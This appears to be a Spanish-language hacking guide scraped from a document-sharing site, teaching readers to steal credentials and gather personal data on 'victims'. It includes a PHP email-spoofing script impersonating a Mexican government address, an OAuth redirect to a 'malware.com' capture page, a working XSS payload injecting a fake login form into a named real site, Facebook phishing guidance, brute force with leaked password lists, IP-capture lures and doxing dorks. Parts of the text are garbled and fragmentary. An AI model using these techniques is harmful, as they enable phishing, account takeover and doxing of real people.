Professional Documents
Culture Documents
Twitter
Facebook
Hacking Social
- Una buena cantidad de tcnicas que pueden ayudarte a robar credenciales -
- Autor: Kelvin Parra -
- informacin darknet
Qu Informacin?
- Correo Electrnico
- Celular Y Telfono Personal y Local
- Direccin De Vivienda Exacta
- GeoLocalizacin
- SSN
- Historial Bancario
- Chats Y Amigos
- Contraseas Dbiles
- Redes Sociales Perfiles
- Historial De Trabajo
en otros casos tambin podemos incluir informacin de los servicios bsicos de
nuestra vctima.
Herramientas:
Podemos obtener informacin pblica de portales una de ella son los currculos
podramos utilizar esta bsqueda de currculos por medio de dorks de igual manera
podramos consultar a Linkedin.
Tambin podemos incluir un nombre y por arte de magia quizs sea el de nuestra
vctima.
site:plus.google.com (nombre)
site:linkedin.com (nombre)
site:twitter.com (nombre)
site:paypal.com/cgi-bin (nombre)
-
- bsqueda por nombre de usuario
- Perfil Linkedin
- Perfil Twitter
- Historial Paypal
Cantidad:
Postfix smtpd 37
Microsoft Exchange smtpd 26
Barracuda Networks Spam Firewall smtpd 5
MailEnable smptd 4
<?php
$to = "MiVictima@gmail.com";
$subject = "Cabeza Titulo";
$txt = "Contenido de mensaje";
$headers = "From: support@presidencia.gob.mx";
mail($to,$subject,$txt,$headers);
?>
$to = destinatario
$subject= titulo cabeza de mensaje
$txt= mensaje
$headers=From: Correo A Suplantar
DKIM: El sistema DKIM (DomainKeys Identified Mail) es una evolucin del sistema
DomainKeys desarrollado inicialmente por Yahoo como un mecanismo para que un
mail pueda ser validado por un destinatario comprobando de forma inequvoca que
el origen del mismo es realmente el que aparece en las cabeceras del email.
DMARC: Despus de establecer los sistemas SPF y DKIM, puedes configurar DMARC
aadiendo polticas a los registros DNS de tu dominio en forma de registros TXT
igual que con SPF y con ADSP.
Ataque Al Servidor STMP
- Escenario De Ataque
Como tal SMTP VRFY Scanner no es un ataque directo pero si el servidor SMTP
tiene activadas algunas opciones que podan conducir potencialmente a la
informacin de fuga de direcciones de correo electrnico esto si puede conducir a
un ataque directo.
Problema En General:
Tomar En Cuenta:
<?php
$to = "MiVictima@gmail.com";
$subject = "Cabeza Titulo";
$txt = "Contenido de mensaje";
$headers = "From: support@presidencia.gob.mx";
mail($to,$subject,$txt,$headers);
?>
El email spoofing es una tcnica muy buena en caso que quieras aplicar ingeniera
social o engaar a tu vctima con un falso seuelo.
GITHUB
-t Realizar un descubrimiento de
expansin de TLD DNS
mail.presidencia.gob.mx
correo.presidenca.gob.mx
stmp.presidencia.gob.mx
todo ello para que entre personal de gobierno o trabajadores del estado por
ejemplo para saber su direccin es necesario echarle un ojo al MX y para ello
utilizamos Dnsdumpster y la extensin o un scanner de puertos como Nmap o
auto deteccin como shodan utilizando su extensin para navegadores lo puedes
descargar Aqui!.
DnsDumpster
para que nosotros observemos la estructura del webmailer debemos saltar esa
barrera es utilizado por muchos y otros utilizan el tpico mtodos de realizar un
ataque de fuerza bruta para lograr autentificar en esa barrera.
- vulnerabilidad bsicas:
mediante una sesin iniciado hackers han llegado a burlar la seguridad desviando
la direccin en este ejemplo redirect_uri=(pagina) en este caso se trata del acceso
a una plataforma de correo.
Ejemplo:
https://www.ejemplo.com/oauth/authorize?response_type=code&client_id=(ID)
&redirect_uri=malware.com/code.php&scope=user
REFERENCIA 1
REFERENCIA 2
<script>document.body.innerHTML=
Modificacin:
Funcin Completa:
https://sw.shop.ca/supplierworld/forgot_password.php?forms_action=forgot_pa
ssword1&forms_show_error=<script>document.body.innerHTML=<center><h1>K
elvinSecurity</h1><form%20name=login%20action=index.php%20method=post>Us
ername:<input%20type=text%20name=username><br>Password:<input%20type=p
assword%20name=password><br><input%20type=submit%20value=Login%20name=
submit></form></center>;</script>
Phishing para facebook o Twitter:
Podemos crear y enviar una imagen que funcione como clickjacking al momento
de clickear la funcin que debe tomar es el redireccionamiento a la pgina falsa de
nuestro servidor si no emite HTML puede ser alguno como este:
Hola, Betsy:
Gracias.
El equipo de Facebook
xxxxx
- Infraestructura Facebook
- HTML CODE
- PHP SCRIPT
HTML CODE MODIFICACIN:
USUARIO:
CONTRASEA:
<?php
}
3 - Bsqueda De Correos Comprometidos
- Me Han Hackeado?
abemos de los leaks que se han presentado ltimamente hoy en da han creado
S
buscadores que hacen posible buscar tu direccin de correo dentro de esa base de
datos para visualizar si tu correo est comprometido con uno de estos masivos
leaks de igual manera las bsquedas en portales donde ltimamente se realizan
estos leaks.
Resultado En Pastebin
- Restos de las fugas
- Otras Fuentes:
- Fuente
- Infraestructura (DB)
3 - Listado De Contraseas Comprometidas
VK Password List
Ventaja: Un usuario podra buscar estas dbs y utilizar la contrasea por defecto
contra su vctima.
Ventaja:
Mediante estos ltimos leaks se puede realizar un diccionario de contraseas que
fueron utilizadas para realizar un ataque de fuerza bruta en otras paginas sociales
el problema es que tanto como Twitter y Facebook bloquean los intentos de acceso
Bloqueando Temporalmente Tu Direccin IP pero no quedara tomar estas
contraseas que fueron las ms utilizadas y crear nuestro propio diccionario.txt
- mobile.twitter.com
Script
3 - Capturar Direccin IP Mediante Seuelo
Capturar IP Vinculo
Qu Es GeoLocalizacion?
Detalles De Funciones:
- Geolocalizacin
No se me quedara atrs y existe 2 formas de obtener estos datos puede ser por
medio de esta estructura o por medio de una terminal.
Infraestructura
Open Source
Geolocalizacin IP:
No es muy complicado y menos llevar mucho que hacer pues solo se trata de
consultar la direccin para obtener detalles sobre esta IP.
ASN
City
Country
Country Code
ISP
Latitude
Longtitude
Organization
Region Code
Region Name
Timezone
Zip Code
Detalles que proporciona ip2geolocation desde la terminal suelen ser los mismos
que en ip2geolocation.com pues la funcion basica es consultar al servidor.
http://ip2geolocation.com/?ip=
3 - Information Disclosure Y Metadatos:
Metadatos: dentro del entorno de bsqueda de datos que proporcionan los ficheros
sea documentos e imgenes en otros casos Audios este mtodo se aplica en la
informtica forense en doxing o cualquiera otra investigacin independiente se
realizan estos trabajos.
La foto que ven como ejemplo fue una fotografa que caus gran importancia
durante tiempos de guerra los terroristas toman fotografas y las publican en redes
sociales pues esta es un ejemplo de como se ha podido localizar mediante
geolocalizacin e identificar un tipo de cmara utilizada.
Herramientas:
geosetter metadata extractor
logipole metadata extractor
ulfwood Metadata Extractor
Foca Metadata Extractor
Descargar FOCA
-
Descripcion: Los documentos que es capaz de analizar son muy variados, siendo
los ms comunes los archivos de Microsoft Office, Open Office, o ficheros PDF,
aunque tambin analiza ficheros de Adobe InDesign, o svg por ejemplo.
Estos documentos se buscan utilizando tres posibles buscadores que son Google,
Bing y Exalead. La suma de los tres buscadores hace que se consigan un gran
nmero de documentos. Tambin existe la posibilidad de aadir ficheros locales
para extraer la informacin EXIF de archivos grficos, y antes incluso de descargar
el fichero se ha realizado un anlisis completo de la informacin descubierta a
travs de la URL.